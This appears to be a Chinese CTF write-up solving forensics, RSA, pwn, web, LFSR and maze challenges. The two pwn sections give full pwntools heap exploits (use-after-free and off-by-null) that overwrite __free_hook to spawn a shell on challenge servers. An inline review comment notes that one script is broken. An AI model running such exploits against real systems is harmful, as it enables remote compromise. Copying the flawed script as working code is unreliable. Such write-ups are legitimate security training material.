
Sqldata
打开附件,发现是SQL注入流量,最后三个流量读取了flag


去除冗余数据,base32解码即可得到flag

其他两段同理


得到flag
flag{a0d78ce4-8072-4e14-939b-cd78392a34f4}
orsa
RSA解密,p^q利用剪枝算法来反求出pq的具体值
import sys
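def search_pq(p, q, modulus=None, xor_bits=None, bits=1024):
    """Recover the two RSA primes from the leaked value ``p ^ q`` by pruned DFS.

    ``p`` and ``q`` are binary prefixes (most significant bit first) of the two
    primes built so far; the search starts from ``"1"``/``"1"`` and fixes one
    more bit of both at every level.  Bit ``depth`` of ``xor_bits`` says whether
    the two primes differ at that position, so only two of the four bit pairs
    are candidates per level, and a branch is dropped as soon as no completion
    of the prefixes can multiply to the modulus.

    Args:
        p: Binary prefix of the larger prime (``p >= q`` is enforced, so each
            unordered pair is found once).
        q: Binary prefix of the smaller prime.
        modulus: The RSA modulus to factor.  Defaults to the module-level ``n``.
        xor_bits: ``bits``-character binary string of ``p ^ q`` with a leading
            ``"0"`` restored (``bin()`` drops it).  Defaults to the
            module-level ``a1``.
        bits: Bit length of each prime; 1024 for this challenge.

    Returns:
        A list of ``(p, q)`` integer pairs that survived every pruning test
        (normally one).  Each pair is also printed, one integer per line, as
        the original script did.  Empty when the branch was pruned.
    """
    if modulus is None:
        modulus = n
    if xor_bits is None:
        xor_bits = a1
    depth = len(p)
    fill = bits - depth
    # Smallest and largest value each prefix can still become.
    lo_p = int(p + "0" * fill, 2)
    hi_p = int(p + "1" * fill, 2)
    lo_q = int(q + "0" * fill, 2)
    hi_q = int(q + "1" * fill, 2)
    # Symmetric solutions are only searched once: keep p >= q.
    if lo_p < lo_q:
        return []
    # No completion can hit the modulus: the smallest product is already too
    # large, or the largest product is still too small.
    if lo_p * lo_q > modulus or hi_p * hi_q < modulus:
        return []
    if depth == bits:
        # Fully determined; fill is 0 so lo_p / lo_q are the primes themselves.
        print(lo_p)
        print(lo_q)
        return [(lo_p, lo_q)]
    found = []
    if xor_bits[depth] == "1":
        # The bits differ: try (1, 0) then (0, 1), in the original order.
        found += search_pq(p + "1", q + "0", modulus, xor_bits, bits)
        found += search_pq(p + "0", q + "1", modulus, xor_bits, bits)
    else:
        # The bits agree: try (0, 0) then (1, 1).
        found += search_pq(p + "0", q + "0", modulus, xor_bits, bits)
        found += search_pq(p + "1", q + "1", modulus, xor_bits, bits)
    return found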
# Challenge parameters: modulus, the leaked p ^ q, ciphertext and public exponent.
n = 17626392212279375795672017937809976432819563702015014286064950438576962829301599887424832742209378051687822421703316130192020970941676594734073337248659576926575409659609517516571173738767919910420753227081676651612998092451924002173008602428197941864705971469948068681614565308570894501692597579202715649837935866803849514492857112054684416002104812289864567355883456430042148145799939586951625034025707736407538180102611049391900268512837878848560854682228074168583637013599117615137668041018375469762511166636852906124939919673060420023287056647653925858064479788117341253962554259945839612998710315288660915390543
pq = 89884656743115795386465259394234594567546130199363180708002290807487206865805972417279697354950018128772500146302322028511803484668179089220615193364070482772703954931838536681720469410883560665407216805250546708783249336389502139655454481491246187888957907623426449041503701395627092371546762192998918782974
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
e = 65537
# The DFS recurses one level per bit of the 1024-bit primes, deeper than the
# default interpreter limit.
sys.setrecursionlimit(1500)
# bin() drops the leading zero bit; restore it so a1[i] lines up with bit i of
# the primes (this assumes p ^ q has exactly 1023 bits, i.e. the primes share
# their top bit).
a1 = "0" + bin(pq)[2:]
# Both primes have their most significant bit set, so the search starts at "1".
p = q = "1"
search_pq(p, q)
得到p和q
p=158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
q=111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041
然后正常RSA解密即可得到flag
from Crypto.Util.number import *
# Primes recovered by the p ^ q search above, plus the public key parameters.
p = 158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
q = 111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041
e = 65537
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
n = p * q
phi = (p - 1) * (q - 1)
# Textbook RSA: private exponent is the inverse of e modulo phi(n).
d = pow(e, -1, phi)
plain = pow(c, d, n)
# Big-endian minimal encoding (at least one byte), matching long_to_bytes.
m = plain.to_bytes((plain.bit_length() + 7) // 8 or 1, "big")
print(m)

flag{2c50b32a-fe84-4f1f-a645-22dcc4caa9b9}
0x100
nc得到源码

发现flag部分数据丢失,利用明文m的高位攻击来恢复
同时需要res = f.small_roots(X = 256^i,beta=0.48)
脚本如下
from Crypto.Util.number import *
from gmpy2 import *
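# Challenge parameters: ciphertext, modulus and the small public exponent that
# makes a stereotyped-message (known high bits) attack possible.
c = 33555838736521638336508564179240154875721919208162692653621849617985366203999316090924212552099132840976315135821908280824203158812899702896949214723368112127500471190187443464058193634562219092511168113924749082876766345406995267519131355826704095496960006139716868408593517285137109832742755581112433110173
n = 74224694190378245570662914514197080111808324634781677418701441263524880254209023098028414752153116247558921852342579052620848368822288495663953364161190265839271585860352129564216547402136600849476321773029405114130903399735699724437227139229796496995834686374625593947966539751536221128712735603857178093087
e = 3
# The polynomial ring depends only on n, so build it once instead of once per
# candidate length (Sage returns the same parent either way).
R = PolynomialRing(Zmod(n), 'x')
x = R.gen()
# The number of unknown flag bytes between "flag{" and "}" is not known; try
# every length from 0 to 99.
for i in range(100):
    dm = b"flag{" + b"\x00" * i + b"}"
    # Zero-pad the message to 114514 bytes — presumably the length the
    # challenge service pads to; verify against the source obtained via nc.
    pad = b"\x00" * (114514 - len(dm))
    mhigh = bytes_to_long(dm + pad)
    # The unknown bytes sit directly above "}" + pad, hence the shift of
    # 256^(len(pad) + 1); the root x of this polynomial is the missing body.
    f = (mhigh + x * 256 ** (len(pad) + 1)) ** e - c
    f = f.monic()
    # X bounds the root: i unknown bytes means x < 256^i.
    res = f.small_roots(X=256**i, beta=0.48)
    print(res)
    if res:
        flag = mhigh + int(res[0]) * 256 ** (len(pad) + 1)
        # Only the leading bytes carry the flag; the slice drops the trailing
        # padding.
        print(long_to_bytes(int(flag))[:43])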

得到flag
flag{8de8cc07-2ca0-48fd-a13e-1ac1d0b38743}
babyheap

存在UAF漏洞
from pwn import *
# Solver for the "babyheap" challenge: drives the service's numbered menu over
# pwntools.  Every prompt string (">> \n", "index: \n", "size: ", "find me\n")
# and every index/size value is specific to this binary; sendlineafter blocks
# until the expected prompt arrives, so a changed prompt stalls the script.
# Coloured stdout helpers (orange / red); both return None.
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.132.99', 21800)
elf = ELF('./pwn')  # loaded but not referenced below
libc = ELF("./libc.so.6")  # symbol offsets used for the leak arithmetic below
# Initial allocations
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "0")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "1")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "555")
p.sendlineafter("find me\n", "1024")
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "2")
p.sendlineafter("size: ", "96")
# Freeing chunks
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "0")
# Corrupting freed chunk
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "0")
p.send(b'\n')
# Allocating more chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "3")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "4")
p.sendlineafter("size: ", "96")
# Overwriting next chunk's header
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x481) + b'\n')
# Free chunk to merge into top chunk
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")
# Leak libc address
p.sendlineafter(">> \n", "4")
p.sendlineafter("index: \n", "1")
# Reads up to the first 0x7f byte and takes the 6 bytes ending there as a
# little-endian pointer; the constant offsets are specific to this libc build.
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
li(hex(libc_base))
# Calculate necessary addresses
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))  # computed but not used below
# Freeing and corrupting chunks to overwrite free_hook
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "5")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "2")
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "5")
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x71) + p64(free_hook) + b'\n')
# Write system address and "/bin/sh" string to chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "6")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "6")
p.send(b'/bin/sh\x00\n')
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "7")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "7")
p.send(p64(system_addr) + b'\n')
# Trigger exploit
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "6")
p.interactive()

得到flag
flag{5dd4ce7c-da45-434f-be5b-32028500cae9}
backleak
源码泄露,dirsearch扫目录

访问得到提示,vi.php

恢复文件
vim -r index.php.swp
得到源码
<!DOCTYPE html>
<!-- index.php as recovered from the leaked index.php.swp (vim -r); the hint
     for the next step is the HTML comment near the end of the document. -->
<html>
<head>
    <title>backleak</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf8">
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            height: 100vh;
            margin: 0;
            background: linear-gradient(to bottom left, #fff, #f8f9fa);
            font-family: 'Helvetica Neue', Arial, sans-serif;
            color: #343a40;
        }
        img {
            width: 300px;
            height: 300px;
            border-radius: 50%;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
        }
        h1 {
            font-size: 2em;
            text-shadow: none;
            color: #212529;
            width: 60%;
            word-wrap: break-word;
        }
    </style>
</head>
<body>
    <h1>你知道^M是什么吗?在哪里经常见过呢?</h1>
</body>
<!-- vi.php -->
</html>
访问vi.php,post传参flag=ok,即可得到flag

得到flag
flag{a72b0871-46cc-44b4-a3ab-9559b0ae0370}
gettingstarted

存在OFF BY NULL漏洞
from pwn import *
from ctypes import *
# Solver for the "gettingstarted" challenge: drives the service's numbered menu
# over pwntools.  Every prompt string and index/size value is specific to this
# binary; sendlineafter blocks until the expected prompt arrives.
# Coloured stdout helpers (orange / red); both return None.
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.131.4', 25825)
elf = ELF('./easy')  # loaded but not referenced below
# NOTE(review): this binds `libc` to a ctypes handle, used only for
# time/srand/rand just below.  The later `libc.sym[...]` and `libc.search(...)`
# calls expect a pwntools ELF object and would raise AttributeError on this
# handle — a separate ELF('./libc-2.27.so') binding appears to be missing.
libc = cdll.LoadLibrary('./libc-2.27.so')
# Reproduce the time-seeded login token: seven values of rand() % 80 + 32
# (assumes the server seeds srand with the same second).
seed = libc.time(0)
libc.srand(seed)
a = [libc.rand() % 80 + 32 for _ in range(7)]
p.sendlineafter("please login >>>>\n", bytes(a))
for i in range(10):
    p.sendlineafter(":", "1")
    p.sendlineafter("Index: ", str(i))
    p.sendlineafter("Size ", "144")
for i in range(7):
    p.sendlineafter(":", "4")
    p.sendlineafter("Index: ", str(i))
p.sendlineafter(":", "3")
p.sendlineafter("Index: ", "7")
# Reads up to the first 0x7f byte and takes the 6 bytes ending there as a
# little-endian pointer; 0x3ebd30 is an offset specific to this libc build.
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x3ebd30
li(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system_addr, bin_sh = libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))  # bin_sh is not used below
for i in range(10):
    p.sendlineafter(":", "1")
    p.sendlineafter("Index: ", str(i + 10))
    p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "17")
p.sendlineafter("Content: ", b'a' * 104 + p8(0xe1))
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "18")
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "19")
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Size ", "216")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Content: ", b'a' * 104 + p64(0x71) + p64(free_hook) + b'\n')
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Content: ", b'/bin/sh\x00\n')
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Content: ", p64(system_addr) + b'\n')
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "27")
p.interactive()

flag{e9dc7427-af2d-4d62-8d8c-cc3656de5a2c}
dirty_data
连接SSH之后发现html下存在源码服务

找到mysql账密
mysql_connect('localhost','ctf','ctf123');
连接之后发现存在一串字段是冗余的

删除第四段数据即可
delete from news where id=4;

稍等一会,即可读取flag

flag{655eba17-be43-4142-9630-9562065bb43b}
LFSR
Lfsr加密,ida反编译可以看到加密逻辑

跟进lfsr_cipher函数


逆向一下即可,脚本如下
# Encrypted bytes lifted from the binary (42 of them) and the 16-bit LFSR
# start state, named after the decompiler's variables.
v5=[0x16,0x54,0x0FD,0x29,0x5C,0x23,0x0EA,0x0A1,0x56,0x0D7,0x3D,0x49,0x72,0x0A6,0x0F5,0x53,0x0D0,0x0E9,0x41,0x82,0x0ED,0x0D4,0x42,0x16,0x0FC,0x2F,0x9F,0x0B7,0x44,0x51,0x2B,0x3C,0x0E5,0x0F6,0x5,0x89,0x0ED,0x0DE,0x44,0x0DE,0x0BE,0x93]
v6 = 44257
v7 = v6
a1 = v7
decoded = []
for byte in v5:
    # One LFSR step: shift right; if the bit that fell off was set, fold in
    # the tap mask 46080 (0xB400).
    dropped = a1 & 1
    a1 >>= 1
    if dropped:
        a1 ^= 46080
    # The low byte of the new state is the keystream byte for this position;
    # XOR is its own inverse, so this undoes the encryption.
    decoded.append(chr((byte ^ a1) & 0xff))
flag = "".join(decoded)
print(flag)
得到flag

flag{0ce4feed-01a1-4694-aa8d-e11c5d9522ec}
Ezmaze
迷宫题,有upx壳

改UPX特征然后脱壳,UPX应该都是大写才对


脱壳之后反编译,查看主体逻辑发现地图
101101
101001
100101
110101
100001
111111
分析代码发现移动按键
# The movement key codes are stored XOR-ed with 0x32 in the binary; undo the
# mask and show the four keys separated by spaces.
wz = [masked ^ 0x32 for masked in (10, 0, 6, 94)]
print(*map(chr, wz), end=" ")

走出地图
22l22ll8888

md5即为flag
from hashlib import md5
# The key sequence that walks out of the maze; its MD5 hex digest is the flag body.
data = "22l22ll8888"
digest = md5(data.encode("utf-8")).hexdigest()
print(f"flag{{{digest}}}")

flag{c534af59b12444af2cefebd25f0efca4}